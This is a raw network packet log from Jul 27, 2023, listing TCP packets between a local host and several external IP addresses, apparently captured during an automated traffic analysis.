Jul 27, 2023 20:19:21.630985022 CEST	49758	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.662640095 CEST	80	49758	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.663969040 CEST	80	49758	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.664396048 CEST	49758	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.755081892 CEST	49749	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:21.755127907 CEST	49749	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:21.777751923 CEST	49758	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.778439999 CEST	49759	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.809802055 CEST	80	49758	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.809953928 CEST	49758	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.810174942 CEST	80	49759	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.810297966 CEST	49759	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.811593056 CEST	49759	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.843239069 CEST	80	49759	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.844314098 CEST	80	49759	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.844466925 CEST	49759	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.982311010 CEST	49759	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.983437061 CEST	49760	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.014820099 CEST	80	49759	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.014923096 CEST	49759	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.015141964 CEST	80	49760	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.016257048 CEST	49760	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.016581059 CEST	49760	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.025966883 CEST	80	49749	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:22.026016951 CEST	80	49749	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:22.044034958 CEST	80	49749	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:22.049829006 CEST	80	49760	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.053322077 CEST	80	49760	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.053457975 CEST	49760	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.088262081 CEST	49749	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:22.181056023 CEST	49760	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.181731939 CEST	49761	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.213471889 CEST	80	49760	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.213573933 CEST	49760	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.214495897 CEST	80	49761	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.214700937 CEST	49761	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.215329885 CEST	49761	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.247524023 CEST	80	49761	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.248446941 CEST	80	49761	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.248709917 CEST	49761	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.355119944 CEST	49761	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.360510111 CEST	49762	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.387680054 CEST	80	49761	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.387840033 CEST	49761	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.392769098 CEST	80	49762	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.392913103 CEST	49762	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.393733978 CEST	49762	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.425476074 CEST	80	49762	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.426887035 CEST	80	49762	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.427014112 CEST	49762	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.553503036 CEST	49762	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.554207087 CEST	49763	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.586150885 CEST	80	49762	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.586183071 CEST	80	49763	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.586251974 CEST	49762	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.586294889 CEST	49763	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.586680889 CEST	49763	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.617990971 CEST	80	49763	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.619537115 CEST	80	49763	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.619774103 CEST	49763	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.703185081 CEST	49749	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:22.730268002 CEST	49763	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.730938911 CEST	49764	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.762399912 CEST	80	49763	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.762437105 CEST	80	49764	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.762512922 CEST	49763	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.762552977 CEST	49764	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.762932062 CEST	49764	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.794574976 CEST	80	49764	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.796222925 CEST	80	49764	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.796300888 CEST	49764	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.934103966 CEST	49764	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.935071945 CEST	49765	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.966046095 CEST	80	49764	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.966167927 CEST	49764	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.967053890 CEST	80	49765	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:22.967152119 CEST	49765	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.971066952 CEST	49765	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:22.974088907 CEST	80	49749	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:22.974195004 CEST	49749	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:23.003155947 CEST	80	49765	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.005398989 CEST	80	49765	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.008083105 CEST	49765	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.066090107 CEST	49766	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:23.123727083 CEST	49765	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.124718904 CEST	49767	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.156708002 CEST	80	49767	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.156908035 CEST	80	49765	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.157058954 CEST	49765	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.157423019 CEST	49767	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.157423019 CEST	49767	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.190027952 CEST	80	49767	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.192291975 CEST	80	49767	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.193177938 CEST	49767	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.236593962 CEST	49768	6932	192.168.2.4	51.89.201.49
Jul 27, 2023 20:19:23.269766092 CEST	6932	49768	51.89.201.49	192.168.2.4
Jul 27, 2023 20:19:23.269857883 CEST	49768	6932	192.168.2.4	51.89.201.49
Jul 27, 2023 20:19:23.299887896 CEST	49694	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:19:23.316832066 CEST	80	49694	188.114.97.7	192.168.2.4
Jul 27, 2023 20:19:23.319173098 CEST	49694	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:19:23.321338892 CEST	49767	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.329281092 CEST	49769	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.340221882 CEST	80	49766	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:23.340362072 CEST	49766	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:23.340622902 CEST	49766	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:23.354717970 CEST	80	49767	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.354794979 CEST	49767	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.361126900 CEST	80	49769	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.361234903 CEST	49769	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.361923933 CEST	49769	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.365952015 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.382076979 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.382216930 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.382514000 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.382567883 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.393325090 CEST	80	49769	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.395101070 CEST	80	49769	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.395899057 CEST	49769	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.398530960 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.398555994 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.495131016 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.495176077 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.495203972 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.495228052 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.495254040 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.495280027 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.495304108 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.495331049 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.495332956 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.495357990 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.495383024 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.495403051 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.495435953 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.495954990 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.495979071 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.496025085 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.514127970 CEST	49769	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.514894962 CEST	49771	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.533873081 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.533906937 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.533931971 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.533956051 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.533981085 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.533982038 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.534049034 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.534276962 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.534302950 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.534322977 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.534327984 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.534353018 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.534372091 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.534377098 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.534430981 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.535231113 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.535258055 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.535281897 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.535305023 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.535307884 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.535331011 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.535367966 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.536144018 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.536171913 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.536195040 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.536196947 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.536221027 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.536226988 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.536246061 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.536298990 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.537113905 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.537142038 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.537163019 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.537198067 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.545794010 CEST	80	49769	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.546861887 CEST	80	49771	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.546942949 CEST	49769	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.546996117 CEST	49771	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.547391891 CEST	49771	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.570482016 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.570514917 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.570566893 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.570591927 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.570616007 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.570638895 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.570641994 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.570662022 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.570714951 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.571129084 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.571155071 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.571172953 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.571196079 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.571207047 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.571243048 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.571753025 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.571779966 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.571804047 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.571826935 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.571834087 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.571852922 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.571872950 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.572797060 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.572851896 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.572890043 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.572910070 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.572927952 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.572953939 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.572976112 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.573120117 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.573695898 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.573759079 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.573782921 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.573831081 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.573836088 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.573860884 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.573870897 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.574645996 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.574675083 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.574698925 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.574723959 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.574724913 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.574748993 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.574768066 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.574791908 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.575619936 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.575648069 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.575671911 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.575695038 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.575695992 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.575720072 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.575747013 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.576535940 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.576564074 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.576585054 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.576589108 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.576613903 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.576625109 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.576637983 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.576668978 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.577490091 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.577518940 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.577543020 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.577565908 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.577584028 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.577611923 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.577630997 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.578429937 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.578454018 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.578504086 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.580187082 CEST	80	49771	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.581845999 CEST	80	49771	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:23.581962109 CEST	49771	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.608699083 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.608737946 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.608762980 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.608784914 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.608787060 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.608812094 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.608815908 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.608869076 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.609030008 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.609054089 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.609076023 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.609097004 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.609097958 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.609119892 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.609138966 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.610006094 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.610038042 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.610047102 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.610061884 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.610083103 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.610124111 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.610650063 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.610681057 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.610697031 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.610707998 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.610732079 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.610754967 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.610757113 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.611188889 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.611617088 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.611644983 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.611669064 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.611692905 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.611695051 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.611716032 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.611735106 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.612582922 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.612615108 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.612637997 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.612647057 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.612663031 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.612685919 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.612687111 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.612754107 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.613579988 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.613609076 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.613631964 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.613653898 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.613656044 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.613681078 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.613692999 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.614454985 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.614481926 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.614510059 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.614535093 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.614558935 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.614576101 CEST	80	49766	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:23.614609003 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.614718914 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.615447044 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.615474939 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.615499020 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.615523100 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.615523100 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.615549088 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.615567923 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.616354942 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.616381884 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.616405010 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.616442919 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.616462946 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.616467953 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.616476059 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.616522074 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.617316008 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.617345095 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.617366076 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.617429018 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.622411966 CEST	80	49766	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:23.624839067 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.624897957 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.624991894 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.625014067 CEST	80	49770	188.114.96.7	192.168.2.4
